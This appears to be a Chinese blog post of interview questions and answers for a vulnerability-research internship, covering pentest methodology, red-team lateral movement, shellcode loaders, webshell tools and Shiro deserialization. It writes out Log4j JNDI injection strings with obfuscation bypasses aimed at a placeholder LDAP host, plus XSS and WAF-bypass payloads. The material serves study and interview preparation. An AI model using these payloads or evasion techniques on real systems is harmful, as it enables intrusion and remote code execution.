2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
深信服-漏洞研究员实习
1. 在XX实习时做了什么
2. 渗透测试的思路简单描述
3. 护网中承担什么角色
4. 红队一些攻击思路
5. 拿下系统如何横向
6. Log4j漏洞(CVE-2021-44228)研究
7. 内存码(Shellcode Loader)了解
8. 冰蝎、哥斯拉工具分析
9. 攻击队研究重点
10. 擅长漏洞/攻击方向
11. Shiro反序列化漏洞解析
12. Bypass方法示例
深某服-漏洞研究员实习
在XX实习时做了什么渗透测试的思路简单描述护网中承担什么角色红队一些攻击思路拿下系统如何横向前段时间的那个log4j有研究吗,可以简单说一下吗(接上)有哪些混淆绕过的方法内存码有没有了解冰蝎、哥斯拉这些工具有没有了解过做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的那么多漏洞和攻击,比较擅长哪一个说下shiro反序列化的形成原因、利用链对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。1. 在XX实习时做了什么
在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:
- 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
- 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
- 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
- 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。
2. 渗透测试的思路简单描述
渗透测试核心流程分五阶段:
- 信息收集:
- 子域名枚举(如
subfinder)、端口扫描(nmap)、指纹识别(Wappalyzer)。- 敏感信息泄露(GitHub源码、备份文件、配置文件)。
- 漏洞扫描与验证:
- 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
- 权限提升:
- 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
- 横向移动:
- 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
- 报告输出:
- 输出漏洞详情、攻击路径图及修复建议。
3. 护网中承担什么角色
- 攻击队角色:
- 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
- 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
- 防守经验:
- 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
- 协助处置应急事件(如Webshell查杀、日志溯源)。
4. 红队一些攻击思路
初始入侵阶段:
- 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
- 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。
横向扩展阶段:
- 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
- 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。
5. 拿下系统如何横向
横向移动关键步骤:
- 信息收集:
- 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
- 凭证利用:
- Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
- 协议漏洞:
- 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
- 隐蔽通道:
- 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。
6. Log4j漏洞(CVE-2021-44228)研究
原理:Log4j 2.x版本解析日志时,未对
${jndi:ldap://xxx}等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。混淆绕过方法:
- 环境变量注入:
${${env:XXX:-j}ndi:ldap://xxx}(利用默认值覆盖)。- Lower/Upper关键字:
${jNdi:ldap://xxx}(大小写绕过)。- 嵌套表达式:
${${::-j}ndi:ldap://xxx}(特殊符号替换)。- 绕过高版本限制:利用上下文变量(如
${ctx:xxx})拼接攻击载荷。
7. 内存码(Shellcode Loader)了解
- 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
- 常见技术:
- 反射型DLL注入:通过
VirtualAlloc分配内存并执行。- 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
- 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。
8. 冰蝎、哥斯拉工具分析
- 冰蝎(Behinder):
- 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
- 检测难点:特征为固定
UA头和Content-Type: application/octet-stream。- 哥斯拉(Godzilla):
- 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
- 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。
9. 攻击队研究重点
- 工具武器化:
- 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
- 开发轻量级漏洞利用工具(如Fastjson一键利用)。
- 流量混淆:
- 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
- 供应链攻击:
- 研究第三方组件漏洞(如npm包、Docker镜像投毒)。
10. 擅长漏洞/攻击方向
反序列化漏洞:
- 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
- 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。
11. Shiro反序列化漏洞解析
形成原因:
- Shiro使用硬编码AES密钥加密
RememberMe字段,攻击者通过伪造Cookie触发反序列化。- 反序列化入口点:
AbstractRememberMeManager#decrypt方法。利用链(以CommonsBeanutils为例):
- 触发点:恶意Cookie → AES解密 → 反序列化 → 调用
BeanComparator.compare()。- 利用链:通过
PropertyUtils.getProperty()触发任意Getter方法,最终执行TemplatesImpl加载字节码。
12. Bypass方法示例
常见绕过姿势:
- 编码混淆:URL编码、Unicode转义(如
<img src=x onerror=alert(1)>→\u003cimg\u0020src=x...)。- 关键字分割:利用注释符或拼接(如
<svg/onload=alert``(1)>)。- 协议特性:
- HTTP参数污染(HPP):
param=1¶m=payload触发解析差异。- 特殊符号:
${1+1}在Thymeleaf等模板引擎中执行表达式。
相关文章:
2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 深信服-漏洞研究员实习 1. 在XX实习时做了什么 2. 渗透测试的思路简单描述 3. 护网中承担什么角色 4…...
(13)Anaconda 安装配置详解
1. Anaconda 简介 Anaconda 是一个用于科学计算和数据分析的 Python 发行版,它集成了 Python 解释器、大量常用的科学计算库以及强大的包管理工具。 2. Anaconda 主要特点 丰富的库集合:包含了超过 1500 个用于科学计算、数据分析、机器学习等领域的常用 Python 库,例如 N…...
MWC 2025 | 移远通信大模型解决方案加速落地,引领服务机器人创新变革
随着人工智能、大模型等技术的蓬勃发展,生成式AI应用全面爆发。在此背景下,服务机器人作为大模型技术在端侧落地的关键场景,迎来了前所未有的发展机遇。 作为与用户直接交互的智能设备,服务机器人需要应对复杂场景下的感知、决策和…...
[内网安全] Windows 域认证 — Kerberos 协议认证
🌟想系统化学习内网渗透?看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客 0x01:Kerberos 协议简介 Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过…...
[Computer Vision]实验七:图像检索
目录 一、实验内容 二、实验过程 2.1 准备数据集 2.2 SIFT特征提取 2.3 学习“视觉词典”(vision vocabulary) 2.4 建立图像索引并保存到数据库中 2.5 用一幅图像查询 三、实验小结 一、实验内容 实现基于颜色直方图、bag of word等方法的以图搜…...
C++之thread_local变量
C之thread_local变量_c threadlocal-CSDN博客 thread_local简介 thread_local 是 C11 为线程安全引进的变量声明符。表示对象的生命周期属于线程存储期。 线程局部存储(Thread Local Storage,TLS)是一种存储期(storage duration),对象的存储是在…...
【国产Linux | 银河麒麟】麒麟化龙——KylinOS下载到安装一条龙服务,起飞!
🗺️博客地图 📍一、下载地址 📍二、 系统安装 本文基于Windows操作系统vmware虚拟机安装 一、下载地址 官网:产品试用申请国产操作系统、麒麟操作系统——麒麟软件官方网站 下载自己需要的版本,完成后,…...
js中的execCommand怎么复制富文本内容解析)
(接“使用js去复制网页内容的方法”)js中的execCommand怎么复制富文本内容解析
document.execCommand(copy) 是传统的剪贴板操作方法,但它主要用于复制纯文本内容。如果你想复制富文本内容(包括 HTML 标签和样式),需要结合一些技巧来实现。以下是具体方法: 方法:通过创建隐藏的富文本元…...
npm ERR! code 128 npm ERR! An unknown git error occurred
【问题描述】 【问题解决】 管理员运行cmd(右键window --> 选择终端管理员) 执行命令 git config --global url.“https://”.insteadOf ssh://git cd 到项目目录 重新执行npm install 个人原因,这里执行npm install --registryhttps:…...
解决Leetcode第3470题全排列IV
3470.全排列IV 难度:困难 问题描述: 给你两个整数n和k,一个交替排列是前n个正整数的排列,且任意相邻两个元素不都为奇数或都为偶数。 返回第k个交替排列,并按字典序排序。如果有效的交替排列少于k个,则…...
MyBatis 配置文件核心
MyBatis 配置文件核心标签解析 以下是针对你的笔记中的三个核心标签的详细解析,帮助你全面理解它们的用途和配置逻辑。 1. properties 标签:动态加载外部配置 功能 将环境相关的配置(如数据库连接、密钥等)与 MyBatis 核心配置…...
bert模型笔记
1.各预训练模型说明 BERT模型在英文数据集上提供了两种大小的模型,Base和Large。Uncased是意味着输入的词都会转变成小写,cased是意味着输入的词会保存其大写(在命名实体识别等项目上需要)。Multilingual是支持多语言的࿰…...
微信小程序接入deepseek
先上效果 话不多说,直接上代码(本人用的hbuilder Xuniapp) <template><view class"container"><!-- 聊天内容区域 --><scroll-view class"chat-list" scroll-y :scroll-top"scrollTop":…...
推荐算法和推荐系统入门第一趴
以下是推荐系统技术总结的架构梳理和建议表达思路: 从原理到生产环境:推荐系统核心技术与实战代码解析 一、推荐算法的演进图谱 传统算法三剑客 ![推荐系统算法分类示意图] (使用Mermaid绘制算法分类关系图,清晰展示技术演进&am…...
unity pico开发 四 物体交互 抓取 交互层级
文章目录 手部设置物体交互物体抓取添加抓取抓取三种类型抓取点偏移抓取事件抓取时不让物体吸附到手部 射线抓取交互层级 手部设置 为手部(LeftHandController)添加XRDirInteractor脚本 并添加一个球形碰撞盒,勾选isTrigger,调整大小为0.1 …...
基于深度学习的青花瓷图像检索系统开发与实现
目录 1.研究背景与目的 1.1课题背景 1.2研究目的 二、调研资料情况 2.1图像分割研究现状 2.2图像检索调研 2.2.1选择深度学习进行检索的原因及优势 2.2.2基于深度学习的图像检索技术的发展 2.2.3基于深度学习的图像检索的研究重点 2.3基于深度学习的图像检索方法调研 …...
—— Vuex 的使用)
uniapp 系统学习,从入门到实战(八)—— Vuex 的使用
全篇大概 4500 字(含代码),建议阅读时间 30min 📚 目录 Vuex核心概念解析在 UniApp 中集成Vuex状态管理与数据共享实践总结 一、Vuex 核心概念解析 1.1 什么是状态管理 在跨多组件的大型应用中,不同页面/组件需要共享和修改相同数据时&am…...
Vue Hooks 深度解析:从原理到实践
Vue Hooks 深度解析:从原理到实践 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家!点我试试!! 文章目录 Vue Hooks 深度解析:从原理到实践一、背景…...
django中序列化器serializer 的高级使用和需要注意的点
在 Django REST framework(DRF)中,序列化器(Serializer)是一个强大的工具,用于将复杂的数据类型(如 Django 模型实例)转换为 Python 原生数据类型,以便将其渲染为 JSON、XML 等格式,同时也能将接收到的外部数据反序列化为 Django 模型实例。以下将介绍序列化器的高级…...
靶场(二)---靶场心得小白分享
开始: 看一下本地IP 21有未授权访问的话,就从21先看起 PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Cant get dire…...
从1997年的论文到2024年的实践:聊聊LEO卫星网络里那个‘过时’但依然有用的DT-DVTR算法
从1997年的论文到2024年的实践:LEO卫星网络里那个‘过时’但依然有用的DT-DVTR算法 在星链(Starlink)和OneWeb掀起全球卫星互联网热潮的今天,回望1997年Markus Werner那篇开创性的论文,会惊讶地发现:现代低…...
FLUX.1-dev-fp8-dit开发:PID控制算法可视化工具
FLUX.1-dev-fp8-dit开发:PID控制算法可视化工具 做自动化控制的朋友,估计没少跟PID算法打交道。调参调到头秃,对着波形图猜哪个参数不对,这种经历大家都有。传统的调试方法,要么在真实设备上反复试错,成本…...
5个步骤掌握B站推流码获取与OBS直播系统搭建:从入门到专业的完整指南
5个步骤掌握B站推流码获取与OBS直播系统搭建:从入门到专业的完整指南 【免费下载链接】bilibili_live_stream_code 用于在准备直播时获取第三方推流码,以便可以绕开哔哩哔哩直播姬,直接在如OBS等软件中进行直播,软件同时提供定义直…...
FPGA资源优化指南:use_dsp48和SIMD模式在Vivado中的实战技巧
FPGA资源优化实战:DSP48E的SIMD模式与use_dsp48高阶应用 在5G信号处理、雷达系统等高性能计算场景中,FPGA开发者经常面临资源利用率与计算性能的双重挑战。Xilinx 7系列及UltraScale架构中的DSP48E1/DSP48E2切片作为专用计算单元,其灵活配置…...
)
手把手教你:FinalShell控制台背景图片自定义替换(无需VIP权限)
1. 为什么需要自定义FinalShell控制台背景? 作为一个每天要和命令行打交道的开发者,我深知一个舒适的开发环境有多重要。FinalShell作为国产SSH客户端的佼佼者,默认的深色背景虽然专业,但看久了难免单调。你可能不知道࿰…...
)
Linux服务器运维必备:ipmitool远程管理命令全解析(附常见问题排查)
Linux服务器运维必备:ipmitool远程管理命令全解析(附常见问题排查) 凌晨三点,机房告警灯突然亮起,服务器无响应——这种场景对运维工程师来说绝不陌生。当SSH连接失效、控制台无法访问时,ipmitool就像服务器…...
SAP CO-PA获利能力分析:关键设置与事务码实战指南
1. SAP CO-PA模块入门:为什么你需要掌握获利能力分析 第一次接触SAP CO-PA模块时,我完全被那些专业术语搞晕了。直到参与了一个零售行业的项目,才真正理解这个模块的价值所在。想象一下,你是一家快消品公司的财务分析师࿰…...
SEO 每天需要做内容优化吗
<h2>SEO 每天需要做内容优化吗?</h2> <p>在当今数字化时代,搜索引擎优化(SEO)已经成为每一个网站和品牌在争夺在线流量和曝光度时不可或缺的工具。面对SEO的复杂性,许多人常常会疑惑:SEO…...
Day | 11 【苍穹外卖统计业务的实现:含详细思路分析】
🔥个人主页:北极的代码(欢迎来访) 🎬作者简介:java后端学习者 ❄️个人专栏:苍穹外卖日记,SSM框架深入,JavaWeb ✨命运的结局尽可永在,不屈的挑战却不可须臾或…...
)
工业设计必看:SolidWorks曲面建模中的NURBS核心原理与7个避坑指南(2024版)
工业设计进阶:SolidWorks曲面建模中的NURBS核心原理与高阶实践(2024版) 在汽车外壳的流线型曲面或消费电子产品的有机形态背后,NURBS(非均匀有理B样条)技术始终是工业设计软件的核心引擎。作为SolidWorks等…...